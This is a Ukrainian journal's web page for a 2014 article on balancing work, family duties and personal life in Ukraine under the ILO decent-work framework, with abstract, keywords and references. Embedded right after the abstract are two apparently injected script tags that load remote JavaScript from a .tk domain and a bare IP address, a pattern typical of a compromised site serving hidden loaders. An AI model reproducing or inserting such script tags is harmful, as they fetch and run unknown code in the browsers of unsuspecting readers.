ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 331.5.024.5
Розвиток сільських територій і соціальна сфера села

Поєднання трудових і сімейних обов’язків та особистого життя в Україні в контексті гідної праці / Спасенко Ю. О. // Економіка АПК. - 2014. - № 6 - С. 51

Здійснено аналіз нормативно-правової бази щодо забезпечення поєднання трудових і сімейних обов’язків та особистого життя в Україні згідно з останніми змінами у законодавстві й відповідно до міжнародних норм. Досліджено стан і динаміку соціально-економічних показників щодо поєднання трудових та сімейних обов’язків в Україні за методологією МОП. Простежено позитивні й негативні тенденції у цій сфері впродовж 2002–2012 рр. Зазначено істотне зростання розмірів виплат при народженні дитини. Виявлено негативне ставлення роботодавців до материнських і сімейних обов’язків жінок при прийманні на роботу. Для поліпшення ситуації необхідне надання працюючим батькам додаткових можливостей на ринку праці. Табл.: 2. Бібліогр.: 16.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: гідна праця, трудові та сімейні обов’язки, вагітність і пологи, догляд за дитиною, виплата допомоги

Список використаних джерел

 1. Конституція України від 28.06.1996 р. / Редакція від 02.03.2014, підстава 742-18 [Електронний ресурс]. – Режим доступу : http://zakon1.rada.gov.ua/laws/show/254к/96-вр.
 2. Закон України „Про державну допомогу сім’ям з дітьми” від 21.11.1992 № 2811-ХII [Електронний ресурс]. – Режим доступу : http://zakon2.rada.gov.ua/laws/show/2811-12.
 3. Закон України „Про загальнообов’язкове державне соціальне страхування у зв’язку з тимчасовою втратою працездатності та витратами, зумовленими похованням” від 18.01.2001 № 2240-ІІІ [Електронний ресурс]. – Режим доступу : http://zakon4.rada.gov.ua/laws.
 4. Закон України „Про відпустки” від 15.11.1996 № 505/96-ВР [Електронний ресурс]. – Режим доступу: http://zakon1.rada.gov.ua/laws/show/504/96.
 5. Закон України „Про забезпечення рівних прав та можливостей жінок і чоловіків” від 08.09.2005 №2866-IV [Електронний ресурс]. – Режим доступу : http://zakon1.rada.gov.ua.
 6. Постанова Кабінету Міністрів України від 27.12.2001 №1751 „Про затвердження Порядку призначення і виплати державної допомоги сім’ям з дітьми” [Електронний ресурс]. – Режим доступу : http://zakon4.rada.gov.ua/laws/show/1751-2001.
 7. Постанова Кабінету Міністрів України від 26.09.2013 №717 Про затвердження Державної програми забезпечення рівних прав та можливостей жінок і чоловіків на період до 2016 р. [Електронний ресурс]. – Режим доступу : http://zakon2.rada.gov.ua/laws/show/717-2013.
 8. Conventions. International organization of labour [Electronic resource]. – Mode of access: http://www.ilo.org.ua/DocLib/Forms/conventions.aspx.
 9. Меморандум про взаєморозуміння між Міністерством соціальної політики України, всеукраїнськими об’єднаннями профспілок та всеукраїнськими об’єднаннями організацій роботодавців та Міжнародною організацією праці щодо Програми гідної праці на 2012 – 2015 роки. – Міністерство соціальної політики України. Міжнародна організація праці [Електронний ресурс]. – Режим доступу : http://search.ligazakon.ua/l_doc2.nsf/link1/MU12251.html.
 10. Профіль гідної праці в Україні ; під ред. В.В. Іванкевича. – МОП, 2011 [Електронний ресурс]. – Режим доступу : http://www.ilo.org/wcmsp5/groups/public/---dgreports.
 11. Праця України за 2002–2012 рр. : Стат. зб. / Державна служба статистики України ; відп. за вип. І.В. Сеник. – К. : ТОВ „Август Трейд”, 2003–2013.
 12. Економічна активність населення України за 2002–2012 рр. : Стат. зб. / Державна служба статистики України ; відп. за вип. І.В. Сеник. – К., 2003 – 2013.
 13. Дані про виконання бюджетів ФСТВП за 2002–2012 рр.
 14. Статистична звітність Ф №2 Звіт про державні допомоги сім’ям з дітьми станом на 1 січня за 2007–2013 рр. – Мінсоцполітики України.
 15. Стат. щорічник України за 2002–2012 рр. / Державна служба статистики України ; за ред. О. Г. Осауленка. – К. : ТОВ „Август Трейд”, 2003 – 2013.
 16. Decent work country profile: Ukraine / International Labour Office, ILO/EC Project “Monitoring and Assessing Progress on Decent Work” (MAP). – Geneva: ILO, 2013 [Електронний ресурс]. – Режим доступу : http://www.ilo.org/wcmsp5/groups/public/---dgreports.
Читати статтю: 14_06_51-57.pdf